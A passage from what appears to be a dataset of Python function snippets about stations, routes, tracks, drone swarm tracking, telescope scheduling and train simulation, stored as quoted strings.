But for now, it will pick randomly!\n station_dict = self.network.station_dict\n\n stations = list(station_dict.keys())\n #stations = [x for x in stations if isinstance(x, int) or x.startswith(\"801\")]\n #stations = [x for x in stations if isinstance(x, int) or x.startswith(\"80139\")]\n weights = [station_dict[x].in_popularity for x in stations]\n\n # pick using the given weight distributions\n self.dest = random.choices(stations, weights=weights)[0]\n\n return", "def greedy_initial(self):\r\n sol = [] # [[0;2;5;0;4;6;0],[],...]\r\n sol_veh_type = [] # corresponding vehicle type for the solution\r\n route_way_time = []\r\n\r\n to_vist = [i+1 for i in range(store_num - 1)] # [1,5,8,...]\r\n itr = 0\r\n\r\n while len(to_vist) > 0 and itr < 500:\r\n itr += 1\r\n\r\n if itr <= small_veh_cnt:\r\n vehicle_type0 = 2\r\n elif itr <= small_veh_cnt + medium_veh_cnt:\r\n vehicle_type0 = 3\r\n else:\r\n vehicle_type0 = 5\r\n\r\n sol_veh_type.append(vehicle_type0)\r\n\r\n used_res = [0, 0, 0, 0] # used volume, and travel time of the vehicle, leave time, travel distance\r\n veh_rout = [0]\r\n\r\n # print '\\nA new vehicle will be used.'\r\n way_time = 0 # travel time of coming to the store + wait time at the store + operation time at this store\r\n while True:\r\n curr_cust = veh_rout[-1]\r\n\r\n next_one, way_time = self.time_nn(way_time, curr_cust, to_vist, used_res, len(veh_rout), vehicle_type0)\r\n next_cust, next_start = next_one[0], next_one[1]\r\n # print('next start', next_cust, next_start)\r\n if next_cust == 0: # next visiting customer is depot\r\n # print 'Get back to the depot, and ready for a new round.'\r\n veh_rout.append(next_cust)\r\n break\r\n\r\n else: # next visiting customer is a store\r\n used_res[0] += (num_demd[next_cust][0] * bskt_vol + num_demd[next_cust][1] * trsf_vol + (num_demd[next_cust][2] + \\\r\n num_demd[next_cust][3]) * milk_vol + num_demd[next_cust][4] * paper_bskt)\r\n used_res[2] = (next_start + oprt_t)\r\n used_res[3] += dist_mat[curr_cust, next_cust]\r\n\r\n\r\n veh_rout.append(next_cust)\r\n # print 'Vehicle used resource: ', used_res\r\n to_vist.remove(next_cust)\r\n\r\n sol.append(veh_rout)\r\n route_way_time.append(way_time)\r\n\r\n # print 'Last point 0 earliest leave time: ', int(used_res[-1]) / 60, ':', int(used_res[-1]) % 60\r\n # print 'Route %s is: ' % itr, veh_rout\r\n print('*'*10, 'Iteration:', itr, '*'*10)\r\n\r\n\r\n if len(to_vist) > 0:\r\n print('number of stores remained: ', len(to_vist))\r\n\r\n return sol, sol_veh_type, route_way_time", "async def set_station(self: SimpleNWS, station: Optional[str] = None) -> None:\n if station:\n self.station = station\n if not self.stations:\n self.stations = [self.station]\n else:\n self.stations = await self.get_points_stations()\n self.station = self.stations[0]", "def add_station(self, station_id=None, time=None, location=None):", "def shortest_tour(tours):\n return min(tours, key=tour_length)", "def _choose_best_trip(self):\n times = [(key, self._trips_dict[key].get_duration()) for key in self._trips_dict.keys()\n if self._trips_dict[key] is not None]\n self._primary_mode = min(times, key=lambda tup: tup[1])[0]", "def add_station(self, station):\n self.__stations.append(station)", "def __init__(self, station_definition=None, number_of_packets_in_record=None, packet_number_in_record=None):", "def __init__(self, station_definition=None, number_of_packets_in_record=None, packet_number_in_record=None):", "def setTrackStartTime() :\n s.startTrack()", "def start_station(self):\n if Config.LOG_TO_CONSOLE and 
Config.LOG_INTERVAL:\n self._log_results(first_time=True)\n\n if Config.WEATHER_UPLOAD and Config.UPLOAD_INTERVAL:\n self._upload_results(first_time=True)\n\n if Config.UPDATE_DISPLAY and Config.UPDATE_INTERVAL:\n self._update_display()", "def make_tree(self):\n\n # list [station_name]\n visited = []\n\n # creates empty station object for each station and adds coordinates\n for station in self.stations:\n new_station = Station(station)\n coordinates = self.stations[station].get_coordinates()\n new_station.add_coordinates(coordinates[0], coordinates[1])\n\n # saves station in prims_tree dictionary\n self.prims_tree[station] = new_station\n\n # choose random beginning station\n random_station = random.choice(list(self.stations.values()))\n\n # sort station connections and retrieve shortest\n station_connections = random_station.get_connections()\n station_connections = sorted(station_connections.items(), key=operator.itemgetter(1))\n new_connection = station_connections.pop(0)\n new_station = new_connection[0]\n new_time = new_connection[1]\n\n # retrieve empty stations from prims_tree dictionary\n first_station = self.prims_tree[random_station.name]\n new_station = self.prims_tree[new_station.name]\n\n # add shortest connection to stations\n first_station.add_connection(new_station, new_time)\n new_station.add_connection(first_station, new_time)\n\n # add stations to visited\n visited.append(first_station.name)\n visited.append(new_station.name)\n\n # runs until all stations are visited\n while len(visited) is not len(self.prims_tree):\n # starts as arbitrarily high number\n min_connection_time = 9999\n\n # get connections of visited stations\n for station in visited:\n connections = self.stations[station].get_connections()\n\n # get time of connections\n for connection in connections:\n connection_time = connections[connection]\n\n # save smallest connection if time is smallest and station is not visited\n if connection.name not in visited and connection_time < min_connection_time:\n smallest_connection = self.prims_tree[connection.name]\n smallest_connection_station = self.prims_tree[station]\n min_connection_time = connection_time\n else:\n continue\n\n # add smallest connection to station in prims_tree dictionary\n smallest_connection_station.add_connection(smallest_connection, min_connection_time)\n smallest_connection.add_connection(smallest_connection_station, min_connection_time)\n\n # add new connection to visited list\n visited.append(smallest_connection.name)\n\n return self.prims_tree", "def add_connection_ending(self, route, potential_solution):\n\n current_station = route.stations[-1]\n new_station = random.choice(list(current_station.connections.keys()))\n link = current_station.connections[new_station] \n time = link.time \n \n\n # only accept the change if it wouldn't exceed the maximum time\n if time + route.total_time <= self.max_minutes:\n \n # insert the connection to the front of the connection list\n route.insert_connection(link, time, -1)\n\n # insert the station to the front of the station list\n route.insert_station(new_station, -1)", "def create_tracks(self, min_interval=30, max_interval=2700, min_length=0.1):\n # Our waypoints for this jaunt\n waypoints = self.waypoints.all().order_by('gmtime')\n\n # Set up accumulating variables\n previous = False\n length = 0\n track_count = 1\n # Set the first times on the trap\n first_wp = waypoints[0]\n # Create first track and 0 out variables\n tracks = Track.objects.filter(start_time=first_wp.localtime)\n if tracks:\n 
track = tracks[0]\n index = 0\n for mt in tracks:\n if index > 0:\n mt.delete()\n index += 1\n\n else:\n track = Track()\n\n track.name = \"%s %d\" % (self.name, track_count)\n track.description = ''\n track.length = 0\n track.ascent = 0\n track.descent = 0\n track.altitude_max = 0\n track.altitude_min = 1000\n track.gpx_file = self\n track.start_time = first_wp.gmtime\n track.end_time = first_wp.gmtime\n track.save()\n\n # Loop through waypoints and measure distances\n for wp in waypoints:\n\n too_long = False\n too_far = False\n too_short = False\n\n if not previous:\n track.waypoints.add(wp)\n previous = wp\n else:\n secs_elapsed = wp.gmtime - previous.gmtime\n if secs_elapsed.seconds > max_interval or secs_elapsed.days > 0:\n too_long = True\n # assert False, [wp,previous,secs_elapsed.seconds,max_interval]\n if secs_elapsed.seconds < min_interval:\n too_short = True\n\n if too_long:\n\n # Add track if it's long enough\n if length > min_length:\n\n track.name = \"%s %d\" % (self.name, track_count)\n track.save()\n self.track_set.add(track)\n\n # Normalise altitude of first waypoint\n# w1 = track.waypoints.all().order_by('gmtime')[0]\n# w2 = track.waypoints.all().order_by('gmtime')[1]\n# w1.altitude = w2.altitude\n# if w1.gmtime == w2.gmtime and w1.latitude == w2.latitude and w1.longitude == w2.latitude:\n# w1.delete()\n# w2.save()\n# else:\n# print w1.id, w1.latitude,w1.longitude,w1.gmtime,w1.altitude\n# w1.save()\n#\n# # Normalise altitude of last waypoint\n# w1 = track.waypoints.all().order_by('-gmtime')[0]\n# w2 = track.waypoints.all().order_by('-gmtime')[1]\n# w1.altitude = w2.altitude\n# if w1.gmtime == w2.gmtime and w1.latitude == w2.latitude and w1.longitude == w2.latitude:\n# w1.delete()\n# w2.save()\n# else:\n# w1.save()\n\n track.update_data()\n\n else:\n track.delete()\n #\n track_count += 1\n # Create new track and 0 out variables\n tracks = Track.objects.filter(start_time=wp.localtime)\n if tracks:\n track = tracks[0]\n index = 0\n for mt in tracks:\n if index > 0:\n mt.delete()\n index += 1\n\n else:\n track = Track()\n\n track.name = \"%s %d\" % (self.name, track_count)\n track.description = ''\n track.length = 0\n track.ascent = 0\n track.descent = 0\n track.altitude_max = 0\n track.altitude_min = 1000\n track.start_time = wp.gmtime\n track.end_time = wp.gmtime\n track.gpx_file = self\n track.save()\n\n # Set up accumulating variables\n previous = False\n length = 0\n track.waypoints.add(wp)\n previous = wp\n # elif too_short:\n # previous = previous\n else:\n\n length += get_distance(previous, wp)\n track.waypoints.add(wp)\n previous = wp\n # del(waypoints)\n\n # Add track if it's long enough\n if length > min_length:\n track_count += 1\n track.name = \"%s %d\" % (self.name, track_count)\n track.save()\n self.track_set.add(track)\n track.update_data()\n\n else:\n track.delete()", "def __init__(self, min_player_count):\n self.min_player_count = min_player_count", "def start_wireless_sensing(self):\n\n gps_pos = self.dc.read_gps()\n n_samples = 256 # DON'T CHANGE TO 128!!!!! 
IT CAUSES KERNEL PANIC (unless you change tick or find another fix)\n if IS_SIMULATION:\n dBm = self.get_simulated_dBm()\n # dBm = random.uniform(-1, -10)\n self.dBm = dBm\n self.ContSamples += 1\n time.sleep(0.01)\n else:\n self.ContSamples += 1\n samples = self.sdr.read_samples(n_samples)\n dBm = 10 * np.log10(np.mean(np.power(np.abs(samples), 2)))\n self.dBm = dBm\n\n if self.ContSamples > self.SamplesToDiscard:\n\n wireless_msg0 = HotspotWirelessMessage(\n location=gps_pos,\n sdr=[],\n dBm=dBm,\n )\n self.flight_logger.log(wireless_msg0)\n\n now = time.time()\n # if ((dBm > THRESHOLD_dBm) and (now - self.lastInsert) >= THRESHOLD_Sampling):\n\n if (now - self.lastInsert) >= THRESHOLD_Sampling:\n if self.FLAG == 2:\n wireless_msg = HotspotWirelessMessage(\n location=self.dc.read_gps(),\n sdr=[],\n dBm=self.dBm,\n )\n self.wireless_logger.log(wireless_msg)\n\n if self.FLAG == 1:\n wireless_msg2 = HotspotFilterMessage(\n hotcaltime=self.hottime,\n alepcaltime=self.aleptime,\n survetime=self.surveytime,\n swarmtime=self.swarmtime,\n FLAG=self.FLAG,\n location=self.dc.read_gps(),\n sdr=[],\n dBm=self.dBm,\n )\n\n self.wireless_filter.log(wireless_msg2)\n\n self.wireless_data.append(wireless_msg0)\n\n self.lastInsert = time.time()\n # if len(self.wireless_data) >= SAMPLES_SWARM * self.sentData:\n if len(self.wireless_data) >= SAMPLES_SL:\n # self.sentData +=1\n self.ready_to_send = True", "def shortest_tour(all_tours):\n shortest = all_tours[0]\n \n for tour in all_tours:\n if tour_distance(shortest) > tour_distance(tour):\n shortest = tour\n return shortest", "def _load_stations(self, nodes: List[OSMNode]) -> None:\n # Process OSM nodes into intermediate stations\n grouped_stations: defaultdict[str, list[IntermediateStation]] = defaultdict(list)\n\n # Iterate thru nodes while popping them from the provided list\n # to allow used nodes to bne garbage collected.\n while nodes:\n node = nodes.pop()\n name_id = node.tags[\"name\"]\n grouped_stations[name_id].append(IntermediateStation(\n node.id,\n name_id,\n node.lat,\n node.lon,\n [k for (k, v) in node.tags.items() if \".\" in k and v == \"yes\"],\n node.tags.get(\"merged\") == \"all\",\n ))\n\n # Convert the intermediate representations to GeoStation\n # (again popping from grouped_stations to allow intermediate representation to be gc-ed)\n while grouped_stations:\n name_id, stations = grouped_stations.popitem()\n merged_all_node = get_merged_all_node(stations)\n\n if len(stations) == 1 and len(stations[0].routes) == 1:\n # Case 1 - one station and one line.\n sta = stations[0]\n sta_id = sta.routes[0] + \".\" + name_id\n self.by_id[sta_id] = GeoStation(sta_id, sta.lat, sta.lon)\n\n elif len(stations) == 1:\n # Case 2 - one station and multiple lines.\n # Simple parent-children structure, all in one location.\n sta = stations[0]\n parent = GeoStation(\"Merged.\" + name_id, sta.lat, sta.lon)\n self.by_id[parent.id] = parent\n\n for route in sta.routes:\n child = GeoStation(route + \".\" + name_id, sta.lat, sta.lon, parent=parent)\n self.by_id[child.id] = child\n parent.children.append(child)\n\n elif merged_all_node:\n # Case 3: many nodes, but all under one parent\n parent = GeoStation(\"Merged.\" + name_id, merged_all_node.lat, merged_all_node.lon)\n self.by_id[parent.id] = parent\n\n for ista in stations:\n for route in ista.routes:\n child = GeoStation(route + \".\" + name_id, ista.lat, ista.lon,\n parent=parent)\n self.by_id[child.id] = child\n parent.children.append(child)\n\n else:\n # Case 4: many nodes, no parent-of-all\n 
needs_merged_no = count_multiple_routes(stations) > 1\n merged_no = 1\n\n for sta in stations:\n if len(sta.routes) == 1:\n # Case 4.1 - single line - behavior as in case 1\n sta_id = sta.routes[0] + \".\" + name_id\n self.by_id[sta_id] = GeoStation(sta_id, sta.lat, sta.lon)\n\n else:\n # Case 4.2 - multiple lines - behavior as in case 2\n parent_prefix = \"Merged.\"\n if needs_merged_no:\n parent_prefix = f\"Merged.{merged_no}.\"\n merged_no += 1\n\n parent = GeoStation(parent_prefix + name_id, sta.lat, sta.lon)\n self.by_id[parent.id] = parent\n\n for route in sta.routes:\n child = GeoStation(route + \".\" + name_id, sta.lat, sta.lon,\n parent=parent)\n self.by_id[child.id] = child\n parent.children.append(child)", "def start_trip(self, live):\n t = Trip(live)\n self.current_trip = t\n if live:\n # Send a request for a new trip to the remote server\n self.get_connection().start_trip()\n else:\n # Add a new trip to the local database\n self.get_database().start_trip(t)", "def swarm_track(self, *args, **kwargs):\n if self.st_type == \"track\" and SHOULD_WAIT:\n if len(self.completion_messages) < len(self.neighbors):\n return\n\n # TODO: make all drones know the st_type. Now only master knows\n if self.st_type == \"simple-track\":\n positions = []\n # Using separate pos_dict because find_center accepts a dictionary as argument\n # Todo: make find_center applicable to lists\n pos_dict = dict()\n dBms = []\n\n for ip, data in self.all_drones_data.items():\n pos_dict[ip] = Coordinate(data['lat'], data['lon'])\n positions.append(pos_dict[ip])\n dBms.append(data['dBm'])\n\n max_dBm_index = dBms.index(max(dBms))\n center_coord = self.find_center(pos_dict)\n pos_with_max_dBm = positions[max_dBm_index]\n max_dBm_bearing = center_coord.bearing_toward(pos_with_max_dBm)\n\n move_distance = 3 # meters\n combo_hotspot = center_coord.offset_bearing(max_dBm_bearing, move_distance)\n else:\n alphas = []\n epsilons = []\n shared_data = []\n for drone_ip, drone_port in self.neighbors:\n self.log.debug('Requesting data from drone {}'.format(drone_ip))\n local_alpha, local_epsilon, samples = send(\n drone_ip=drone_ip,\n mission_id=self.mission_id,\n endpoint='/share',\n skyserve_port=drone_port,\n ).json().get('data', {})\n if local_alpha == 0.0 and local_epsilon == 0.0:\n return\n self.log.debug('Received data')\n alphas.append(local_alpha)\n epsilons.append(local_epsilon)\n samples = [[sample['lat'],\n sample['lon'],\n sample['alt'],\n sample['dBm']] for sample in json.loads(samples)]\n\n shared_data.append(samples)\n\n drone_count = len(self.neighbors)\n\n prediction = predict(dronenum=drone_count,\n maxRun=1,\n numIterations=GDParameters.NUM_ITERATIONS,\n numEpoch=GDParameters.NUM_EPOCH,\n threshold=GDParameters.THRESHOLD,\n learning_rate=GDParameters.LEARNING_RATE,\n numberBatch=1,\n data_length=SAMPLES_SWARM*drone_count)\n\n if 1 < drone_count <= 3:\n try:\n start = time.time()\n hotspot = prediction.swarm(drone_data=shared_data,\n alphas=alphas,\n epsilons=epsilons)\n end = time.time()\n self.swarmtime = end - start\n self.log.debug('Drone is using data from {a} drones'.format(a=drone_count))\n except IndexError:\n self.log.warn('Hotspot localization failed. 
Data not good enough.')\n return\n else:\n self.log.warn('Drone Number Incorrect')\n return\n\n combo_hotspot = Coordinate(hotspot[0], hotspot[1])\n\n self.log.debug('=========================================================================')\n self.log.debug('Calculated new hotspot at location: {}'.format(combo_hotspot))\n # TODO: allow this to run in all mission types\n # This would require implementing simulated cheater in all types, not just track\n # if IS_SIMULATION and (self.st_type == \"track\" or self.st_type == \"simple-track\"):\n if IS_SIMULATION:\n error = combo_hotspot.distance_to(self.current_simulated_hotspot)\n self.log.debug('Simulated error: {err}, Simulated hotspot has moved {dist} meters to: {loc}'.format(\n err=error,\n dist=self.hotspot_meters_moved,\n loc=self.current_simulated_hotspot\n ))\n self.log.debug('=========================================================================')\n\n if not self.region.contains(combo_hotspot) and not IS_SIMULATION:\n self.log.debug('New hotspot is out of region')\n return\n\n if self.st_type == \"track\" or self.st_type == \"simple-track\":\n self.completion_messages = set()\n\n if self.st_type != \"hover\" and self.st_type != \"spin\":\n for drone_idx, (drone_ip, drone_port) in enumerate(self.neighbors):\n self.log.debug('Sending drone at IP {drone_ip} to new hotspot location.'.format(\n drone_ip=drone_ip,\n ))\n\n send(\n drone_ip=drone_ip,\n mission_id=self.mission_id,\n endpoint='/swarm',\n data={\n 'lat': combo_hotspot.lat,\n 'lon': combo_hotspot.lon,\n },\n skyserve_port=drone_port,\n async=True,\n )", "def enter_pending_start(self, count=10):\n self.app.pingWebSessions()\n\n if count == 0:\n self.app.admin.hangup(self.channel)\n\n d = self.agi.streamFile(\"weareforests-audio/welcome\", chr(self.digit))\n def audioDone(r):\n digit, offset = r\n if digit == self.digit:\n self.setStateAfterSample(\"start\", \"weareforests-audio/shortsilence\")\n else:\n self.state.set(\"pending_start\", count-1)\n d.addCallback(audioDone)\n d.addErrback(self.catchHangup)", "def stations(update, context):\n db_helper.insert_chat_id(update.effective_chat.id)\n message = processor.process_stations_chat(update, context)\n processor.send_message(update, context, message)", "def _add_start_entry(self):\n return self._db.insert(\n {'device': self._device, 'string': self._string, 'start': datetime.utcnow(), 'duration': 0})", "def firstTracks(analyzer):\n return lt.subList(analyzer['tracks'],0,4)", "def earliest_arrival(jump_distance, stones):\n #jump_distance of 3 means they skip 2 stones and land on 3rd\n stone = ''\n #based on jump_distance, what are all the stone nums within that distance\n #when jump_distance is 5, can jujp to stones[4]\n \n stone = min(stones[:(jump_distance - 1)]) #stone = 2\n\n t = max(0, stone) #t = 2\n print(f't starts at = {t}')\n i = stones.index(stone) # i = 1\n print(f'i starts at = {i}') \n #as long as \n while i + jump_distance <= len(stones) - 1: # 3 + 5 <= 7\n print(f'i + jump_distance = {i + jump_distance}')\n\n stone = min(stones[(i + 1):(i + jump_distance)]) #stone = 3\n print(f'stone: {stone}')\n if t < stone: \n t = stone #reassign to 3\n \n i = stones.index(stone) # i = 2\n print(f'i = {i}') \n stone = min(stones[(i + 1):(i + jump_distance)]) #stone \n t = max(t, stone)\n print(f'end of while loop: t = {t}') \n \n return t\n #what's the lowest num within that jump_distance \n #go to that stone, then look at next stones in new jump_distance\n #t becomes whatever stone we jumped to\n #if the next stone we jump to 
is a higher value, reassign t\n #get length of list of stones so we don't go past length\n #var assigned to len(list) and compare to index we're at \n #if index we're jumping to is higher than len of list, then we're done\n #control for indexerror with while loop?\n # ", "def start_trip(self, at_time: float):\n self.start_time = at_time\n self.traveled_nodes = [(at_time, self.base_route[0])] # Start node", "def choose_next_target(self, old_sInd, sInds, slewTimes, intTimes):\n\n Comp = self.Completeness\n TL = self.TargetList\n TK = self.TimeKeeping\n OS = self.OpticalSystem\n Obs = self.Observatory\n allModes = OS.observingModes\n\n # cast sInds to array\n sInds = np.array(sInds, ndmin=1, copy=False)\n\n if OS.haveOcculter:\n # current star has to be in the adjmat\n if (old_sInd is not None) and (old_sInd not in sInds):\n sInds = np.append(sInds, old_sInd)\n \n # calculate dt since previous observation\n dt = TK.currentTimeNorm.copy() + slewTimes[sInds] - self.lastObsTimes[sInds]\n # get dynamic completeness values\n comps = Comp.completeness_update(TL, sInds, self.starVisits[sInds], dt)\n \n # if first target, or if only 1 available target, \n # choose highest available completeness\n nStars = len(sInds)\n if (old_sInd is None) or (nStars == 1):\n sInd = np.random.choice(sInds[comps == max(comps)])\n return sInd, None\n \n # define adjacency matrix\n A = np.zeros((nStars,nStars))\n \n # only consider slew distance when there's an occulter\n if OS.haveOcculter:\n r_ts = TL.starprop(sInds, TK.currentTimeAbs)\n u_ts = (r_ts.value.T/np.linalg.norm(r_ts, axis=1)).T\n angdists = np.arccos(np.clip(np.dot(u_ts, u_ts.T), -1, 1))\n A[np.ones((nStars), dtype=bool)] = angdists\n A = self.coeffs[0]*(A)/np.pi\n \n # add factor due to completeness\n A = A + self.coeffs[1]*(1 - comps)\n \n # add factor due to unvisited ramp\n f_uv = np.zeros(nStars)\n unvisited = self.starVisits[sInds]==0\n f_uv[unvisited] = float(TK.currentTimeNorm.copy()/TK.missionLife.copy())**2\n A = A - self.coeffs[2]*f_uv\n\n # add factor due to revisited ramp\n # f2_uv = np.where(self.starVisits[sInds] > 0, 1, 0) *\\\n # (1 - (np.in1d(sInds, self.starRevisit[:,0],invert=True)))\n f2_uv = 1 - (np.in1d(sInds, self.starRevisit[:,0]))\n A = A + self.coeffs[3]*f2_uv\n \n # kill diagonal\n A = A + np.diag(np.ones(nStars)*np.Inf)\n \n # take two traversal steps\n step1 = np.tile(A[sInds==old_sInd,:], (nStars, 1)).flatten('F')\n step2 = A[np.array(np.ones((nStars, nStars)), dtype=bool)]\n tmp = np.argmin(step1 + step2)\n sInd = sInds[int(np.floor(tmp/float(nStars)))]\n\n else:\n nStars = len(sInds)\n\n # 1/ Choose next telescope target\n comps = Comp.completeness_update(TL, sInds, self.starVisits[sInds], TK.currentTimeNorm.copy())\n\n # add weight for star revisits\n ind_rev = []\n if self.starRevisit.size != 0:\n dt_rev = self.starRevisit[:,1]*u.day - TK.currentTimeNorm.copy()\n ind_rev = [int(x) for x in self.starRevisit[dt_rev < 0 , 0] if x in sInds]\n\n f2_uv = np.where((self.starVisits[sInds] > 0) & (self.starVisits[sInds] < self.nVisitsMax), \n self.starVisits[sInds], 0) * (1 - (np.in1d(sInds, ind_rev, invert=True)))\n\n weights = (comps + self.revisit_weight*f2_uv/float(self.nVisitsMax))/intTimes\n\n sInd = np.random.choice(sInds[weights == max(weights)])\n\n waitTime = slewTimes[sInd]\n #Check if exoplanetObsTime would be exceeded\n mode = list(filter(lambda mode: mode['detectionMode'] == True, allModes))[0]\n maxIntTimeOBendTime, maxIntTimeExoplanetObsTime, maxIntTimeMissionLife = TK.get_ObsDetectionMaxIntTime(Obs, mode)\n 
maxIntTime = min(maxIntTimeOBendTime, maxIntTimeExoplanetObsTime, maxIntTimeMissionLife)#Maximum intTime allowed\n intTimes2 = self.calc_targ_intTime(sInd, TK.currentTimeAbs.copy(), mode)\n if intTimes2 > maxIntTime: # check if max allowed integration time would be exceeded\n self.vprint('max allowed integration time would be exceeded')\n sInd = None\n waitTime = 1.*u.d\n \n return sInd, waitTime", "def add_person_to_the_station(self, line, station):\n\n if line in self.__stations_dict:\n if station in self.__stations_dict[line]:\n self.__stations_dict[line][station] += 1\n else:\n self.__stations_dict[line][station] = 1\n else:\n self.__stations_dict[line] = {station: 1}", "def test_get_closest_stations(self):\n\t\tpoint = \"POINT(40.71911552 -74.00666661)\"\n\t\tstations = set(server.get_closest_stations(point))\n\t\t# find the closest stations, make them a set of objects see if sets intersect completely", "def update_base_stations_in_range(self, base_station_list):\r\n self.base_stations_in_range = []\r\n for station in base_station_list:\r\n # Don't compare a base station with itself\r\n if station != self:\r\n for freq_range in station.currently_used_frequencies:\r\n received_power = self.calculate_signal_power(\r\n station, freq_range)\r\n if received_power > settings.power_threshold:\r\n self.base_stations_in_range.append(\r\n [station, freq_range])", "def shortest_tips(neuron):\n (branch_index,) = np.where(neuron.branch_order[neuron.n_soma:] == 2)\n (endpoint_index,) = np.where(neuron.branch_order[neuron.n_soma:] == 0)\n selected_index = np.union1d(endpoint_index + 1,\n branch_index + 1)\n selected_index = np.append(0, selected_index)", "def start(update: Update, context: CallbackContext):\n first_set(update, type=\"initial\")", "def min_players(self, min_players):\n\n self._min_players = min_players", "def lowest_simulation(num):\n routes = {}\n for i in range(num):\n itinerary = greedy_path()\n distance = get_total_distance(itinerary)\n routes[distance] = itinerary\n shortest_distance = min(routes.key())\n route = routes[shortest_distance]\n return shortest_distance, route", "def minimum_spanning_tree(self, start_vertex):\n\n # Initialize sets of seen variables to far in the algorithm\n taken_edges = set()\n taken_vertices = set([start_vertex])\n all_vertices = set(self._edges.keys())\n \n # Create a list from the neighbors, heapify to turn into a queue\n neighbors_iterator = ((w, (start_vertex, v)) for (v, w) in \n self.neighbors(start_vertex, and_weights=True))\n queue = list(neighbors_iterator)\n heapq.heapify(queue)\n \n # While not every single vertex is taken\n while not (taken_vertices == all_vertices):\n\n # Pop the minimum edge (u, v) from the priority queue\n weight, (u, v) = heapq.heappop(queue)\n\n # If v is already taken, we have a cycle and continue\n if v in taken_vertices:\n continue\n \n # If v is not already taken, add the edge and vertex to the sets\n taken_vertices.add(v)\n taken_edges.add((frozenset((u, v)), weight))\n \n # Get edges going out to neighbors of v, i.e. every (v, u)\n for (u, w) in self.neighbors(v, and_weights=True):\n\n # If u is taken the edge is not interesting, since it would\n # add a cycle. If it's not taken, add to the queue\n # This if-statement speeds up computations from 5 to 4.5s\n if u not in taken_vertices:\n heapq.heappush(queue, (w, (v, u)))\n \n # The minimum spanning tree is found. 
Extract information and create\n # a new graph from it.\n mst_edges = [(u, v) for ((u, v), weight) in taken_edges]\n mst_weights = [weight for ((u, v), weight) in taken_edges]\n \n return type(self)(mst_edges, mst_weights)", "def add_next(self, requester: int, track: dict):\n self.queue.insert(0, AudioTrack().build(track, requester))", "def set_start(self, ts):\n base_key = self.floor_time(ts)\n if self.first_timestamp is None or base_key < self.first_timestamp:\n self.first_timestamp = base_key", "def add_stations(stations, pool):\n\n for station in stations:\n\n print(add_station(pool=pool, name=station.get('name'), latitude=station.get('latitude'),\n longitude=station.get('longitude'), station_type=station.get('station_type'),\n description=station.get('description')))\n print(station.get('name'))", "def add_picks(sta, e, orig_time, st, cfg):\n from obspy.core.event import (Pick, WaveformStreamID, EvaluationMode,\n QuantityError)\n for n_p, p in enumerate(sta[\"best_obs\"]):\n if n_p == 0:\n phase = \"P\"\n elif n_p == 1:\n phase = \"S\"\n if p and p[3] != 4:\n pick = Pick(waveform_id=WaveformStreamID(\n network_code=st[0].stats.network,\n station_code=st[0].stats.station,\n channel_code=p[2]),\n time=p[0], phase_hint=phase,\n evaluation_mode=EvaluationMode(\"automatic\"),\n time_errors=QuantityError(\n uncertainty=cfg.picking.T_ERRORS[p[3]]))\n e.picks.append(pick)\n return(e)", "def audio_cd_start_track(self, audio_cd_start_track):\n self._audio_cd_start_track = audio_cd_start_track", "def update_train_loc(self):\n\n trains_on_green = [] # Keep running list of blocks a train is on\n trains_on_red = []\n\n i = 0\n while i < len(self.trains_arr):\n if self.trains_arr[i].line_on == Line.LINE_GREEN:\n\n # If train has not made it out of the yard yet\n if self.trains_arr[i].index_on_route == 0:\n if self.trains_arr[i].route_blocks_arr[1] not in trains_on_green:\n if self.blocks_green_arr[self.trains_arr[i].route_blocks_arr[1] - 1]\\\n .occupied:\n self.trains_arr[i].index_on_route += 1\n trains_on_green.append(self.trains_arr[i].route_blocks_arr[1])\n else:\n i += 1\n continue\n # If train has reached the yard\n elif self.trains_arr[i].index_on_route == (len(self.trains_arr[i].route_blocks_arr\\\n ) - 1):\n self.trains_arr.pop(i)\n self.train_numbers.pop(i)\n i -= 1\n # If train is already on tracks; Advance train if block it says its on is\n # not occupied\n else:\n if not self.blocks_green_arr[self.trains_arr[i].route_blocks_arr\\\n [self.trains_arr[i].index_on_route] - 1].occupied:\n\n self.trains_arr[i].index_on_route += 1\n\n if self.trains_arr[i].authority == 1:\n self.trains_arr[i].authority = 3\n else:\n self.trains_arr[i].authority -= 1\n\n if self.trains_arr[i].command_speed == 70:\n self.trains_arr[i].command_speed = 71\n else:\n self.trains_arr[i].command_speed = 70\n\n # Send upated command speed and authority to SW Track Controller\n signals.swtrack_update_authority.emit(self.trains_arr[i].train_id,\\\n self.trains_arr[i].authority)\n signals.swtrack_update_speed.emit(self.trains_arr[i].train_id,\\\n self.trains_arr[i].command_speed)\n trains_on_green.append(self.trains_arr[i].route_blocks_arr\\\n [self.trains_arr[i].index_on_route])\n else:\n i += 1\n continue\n\n # If Line on RED\n else:\n # If train has not made it out of the yard yet\n if self.trains_arr[i].index_on_route == 0:\n if self.trains_arr[i].route_blocks_arr[1] not in trains_on_red:\n if self.blocks_red_arr[self.trains_arr[i].route_blocks_arr[1] - 1]\\\n .occupied:\n self.trains_arr[i].index_on_route += 1\n 
trains_on_red.append(self.trains_arr[i].route_blocks_arr[1])\n else:\n i += 1\n continue\n # If train has reached the yard\n elif self.trains_arr[i].index_on_route == (len(self.trains_arr[i].route_blocks_arr\\\n ) - 1):\n self.trains_arr.pop(i)\n self.train_numbers.pop(i)\n i -= 1\n # If train is already on tracks; Advance train if block it says its on is\n # not occupied\n else:\n if not self.blocks_red_arr[self.trains_arr[i].route_blocks_arr\\\n [self.trains_arr[i].index_on_route] - 1].occupied:\n\n self.trains_arr[i].index_on_route += 1\n\n if self.trains_arr[i].authority == 1:\n self.trains_arr[i].authority = 3\n else:\n self.trains_arr[i].authority -= 1\n\n if self.trains_arr[i].command_speed == 70:\n self.trains_arr[i].command_speed = 71\n else:\n self.trains_arr[i].command_speed = 70\n\n # Send upated command speed and authority to SW Track Controller\n signals.swtrack_update_authority.emit(self.trains_arr[i].train_id,\\\n self.trains_arr[i].authority)\n signals.swtrack_update_speed.emit(self.trains_arr[i].train_id,\\\n self.trains_arr[i].command_speed)\n trains_on_red.append(self.trains_arr[i].route_blocks_arr\\\n [self.trains_arr[i].index_on_route])\n else:\n i += 1\n continue\n i += 1", "def _pick_server(self, key, inport): #key = ipp.srcip, ipp.dstip, tcpp.srcport, tcpp.dstport\n\n if len(self.total_connection) == 0: # {server_IP : total connection}\n return self.live_servers.keys()[0] #{IP : MAC,port}\n ipserver = self.total_connection.keys()[0]\n totalconns = self.total_connection[ipserver]\n \"\"\"\n Select server with least connections\n \"\"\"\n if len(self.total_connection) == 0:\n return self.live_servers.keys()[0]\n ipserver = self.total_connection.keys()[0]\n totalconns = self.total_connection[ipserver]\n \n for x in self.total_connection: #finding the server IP having least no. 